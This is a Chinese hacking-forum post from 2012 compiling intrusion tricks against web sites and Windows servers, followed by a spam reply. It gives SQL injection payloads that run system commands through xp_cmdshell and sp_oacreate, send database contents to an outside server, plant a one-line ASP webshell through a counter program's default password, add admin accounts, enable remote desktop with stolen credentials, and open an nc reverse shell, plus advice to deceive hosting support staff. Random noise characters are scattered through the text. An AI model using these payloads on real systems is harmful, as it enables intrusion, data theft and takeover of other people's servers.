找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 站库分离的方法
返回列表 发新帖
查看: 4263|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
7 f/ E- ]: P$ @% l: c, F# X
# G9 k0 D: T8 _: ]7 o8 {% t3 s! O8 D
SA点数据库分离搞法+语句:3 |5 @8 j$ P2 S$ w

3 s4 `! r0 w, W" z5 L! y2 _注射点不显错,执行下面三条语句页面都返回正常。: t' a' J- b* k2 P" h
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')( H& E( X' V6 F$ X7 @( [7 A
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')  N$ }+ r' f3 p. z# T
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
) n- o! ?6 e0 C4 b! z可以列目录,判断系统为2000,web与数据库分离" F( A) ^; w4 h# E) ~7 |8 q* j/ O3 P
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
8 Y6 X) |& S7 t  w6 C在注射点上执行
, I0 W. n" _( a: V# bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
" I- Y- l  m0 ?: s+ {& ~页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
0 _8 ~3 S& f- _2 d) r1 A3 _还有我用NC监听得其他端口都没有得到IP。/ t* d3 v9 }* u' h/ ^' u2 Y1 @

' `9 O. b1 t. P+ X通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。6 N& A3 _+ y: g4 j2 g- S2 R( I3 n
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
6 _6 `, j4 ~% W/ z% t: a% g0 R" s" q  Y
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--( M* T9 N2 B& `6 d) Q' _( J. p
7 c' n' s) L. h& n2 ^- M& }
现在就猜想是不是数据库是内网而且不能连外网。
$ E2 h' y% K! A5 H" W3 }. c
+ D' r8 j; }+ v5 I9 @* K3 E% e7 ~% T1 M
access导出txt文本代码
) G; [5 b; Z1 o& \9 dSELECT * into [test.txt] in 'd:\web\' 'text;' from admin& q& p' I+ a  w6 A5 w$ B
: |. o  J, I1 r1 X' Y$ J

8 ], O2 ^& y$ d
1 Q1 ^1 i% B& w5 V( N自动跳转到指定网站代码头- {* q( [' m1 {) u! o
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>5 @+ g5 p! i" g, ^, U8 u# q
/ u3 {# X/ V4 Z6 r* c

* X5 R. R4 b0 J. [! r( M% u( W入侵java or jsp站点时默认配置文件路径:3 ~% V4 L- @9 Q% V% J0 G" v3 @
\web-inf\web.xml- D% R: X8 K* U8 j2 \  p, Y
tomcat下的配置文件位置:: k* M. }" q! W- \2 C3 _$ y+ e
\conf\server.xml            (前面加上tomcat路径)9 k* t% n, b& a8 s* r  T+ U
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml# S! x: V" c4 c  _! {' _0 u5 _

8 j) F0 M* h# m8 P8 U+ h$ @
3 x$ E8 _7 a9 I! _) q9 ?, x; Y) J7 r8 j6 \- P
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:4 r( C' v. B# b' f9 ]/ V
-1%23
9 y8 [  E1 T5 f" K9 }> , [& |4 ^, ^. z7 O; x5 ^
<. O$ T& [+ t" `( U6 z! C. @
1'+or+'1'='15 T  h1 S8 i9 h  a
id=8%bf
+ Y4 A6 e0 E, R4 j5 ~- ^, U( D1 ~! }  y: M7 t3 _3 }& ~
全新注入点检测试法:
; i  E# H+ U! K2 q- Y8 @% ?在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
# S" ?/ o" u1 L7 A0 x7 G* s% a* T5 T2 q, h) T7 S' M
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
) ^2 @! w: V; P
  u! E  ]+ U3 \6 o1 x; V3 y搜索型注入判断方法:% q7 i% l; R* U6 Z& b7 z
北京%' and '1'='1' and '%'='
, z3 O& M  n: f! M! ?/ {北京%' and '1'='2' and '%'=') q6 @1 ~6 H" U% c; _+ j! Y9 Z# S+ Y

7 x, X) _4 Z1 f/ h& S5 F7 W  a; [8 @1 t- b/ y" M; n2 L
COOKIES注入:$ w' N; Y3 L5 S% i- m

9 j) u* [' L8 Xjavascript:alert(document.cookie="id="+escape("51 and 1=1"));) f4 R1 {5 q4 q; e7 `2 i  c, T/ L

4 e* a# ^0 a3 i7 w% |! @$ l! u7 d2000专业版查看本地登录用户命令:+ Q; z) V  G' H4 J9 H& |
net config workstation2 m9 G0 g' h9 p* v, B6 O% k

5 t3 w1 e3 v* b; p+ W
/ I/ e' c) f6 d3 @4 Z- J2003下查看ipsec配置和默认防火墙配置命令:
5 \8 E, y  h6 j* O  @netsh firewall show config
! a% q8 c# ~9 O2 Unetsh ipsec static show all& N0 i" Q* O% u0 b0 G5 [, n3 o

- M+ M7 d% P7 l不指派指定策略命令:
# u/ ~! T, i6 u, ^! Y' Cnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
6 F3 h3 g. z/ ~& b( ?' }netsh ipsec static show policy all  显示策略名5 \  |* `9 g. G# h: j6 x
9 T( o5 i+ N  {- p$ j5 Y
1 q9 Z; z3 R% i  V) U0 e( v
猜管理员后台小技巧:
# N( G( _9 o4 P7 h8 S3 @  @0 ~admin/left.asp ( N# m( X4 |8 `- y3 J0 |
admin/main.asp2 F* o8 ~1 I# P" g
admin/top.asp$ m4 D1 V* z3 ~/ y: Y
admin/admin.asp
0 a: I/ ~, v, Z' s会现出菜单导航,然后迅雷下载全部链接# W5 |" ?9 e1 {4 y0 G( C9 r
. ]  c/ E( Q  r/ d+ X
& R/ Q1 c  J: ?" D
社会工程学:7 g+ }( F1 |. h! X
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人- c3 s: d# N" D9 d" G
然后去骗客服' q" n$ Z8 j' v+ `3 X/ @
& `* \# Z9 L$ M2 Q  G$ v2 I2 _
- e7 @+ N/ B* J4 n
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
5 f0 k# j' B% _; [" |( @) g查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
* W. L: {3 `. `( Q3 H2 `  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
3 s6 m9 j1 W, d. ^; Y" b, k( O, ]8 ~: t# h6 t3 k) k

; C! Q) P  e5 H* F! a/ |
/ `: B) s, M! V5 _. p6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)& k" ^: B  u$ B* X

2 n, J3 x, }# `5 M6 C. p8 i4 j
% o2 I8 n6 q4 B% X9 d
. X# q4 y; w5 E/ |CMD加密注册表位置2 M* a' B+ Q  b# e* x/ g7 k
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor  s# n* W/ z( ?5 a$ g' M: G
AutoRun# C5 w; Y& ^/ K4 E$ E4 f

, n6 D. ^7 K; F  @+ S! A(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
" i2 _( T+ b6 @5 Z5 wAutoRun) t" a0 Z1 M1 A
8 ~0 Q( i5 f  n& j" l8 \

1 b. ^9 M* f; ^! N. W3 o0 a" C在找注入时搜索Hidden,把他改成test! o! e" I' f  x9 u) T

1 H; g, M* B. ~2 d% X0 i2 F* f5 ?
+ I" A" B) d) K& [# l% a4 W- Z( O
mstsc /v:IP /console ) a- D6 m, l2 ]6 f/ n

% S1 _% V! S, q  o6 j5 L
3 o, o: w5 M* b% `一句话开3389:/ l4 u0 M6 c+ w: Q% v' U
/ R! p' M. P( D/ f/ q6 I" @1 S
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
2 n. ?0 v  L, |% r  d1 @5 @( ]开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.$ Z9 C/ r2 n" U( K- H2 c
9 I: c$ R7 F% c! i/ m( J

4 ~' r3 x2 C7 @, _5 c/ P+ Y# p知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
3 c4 T! V; z0 L8 \2 J; ?0 b% AInsert into admin(user,pwd) values('test','test')4 C1 D$ |- v9 S, K5 f; N' O7 i
" U" G/ g. f% t0 j* r
- l, u: D% k2 L) t! o
NC反弹, G3 A* h. m9 S. z' |
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   " L, B! f- ?. W* t0 F
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)& D0 {) ^2 b3 H$ p1 t

4 h) l$ S; X4 I& R0 r: Q( R# K" Y  V$ m  t* T% c& a1 e. [% Y
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题' w* C* N+ p$ c4 R& x& `1 c- a

$ C# R2 J2 \, r6 w6 V有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录. Y. [. M. p" C0 o, f
例如:4 b7 W; }8 _# u6 j/ t8 O1 [  k3 H+ z
subst k: d:\www\ 用d盘www目录替代k盘
+ p4 k) h9 _, X# c  S" tsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表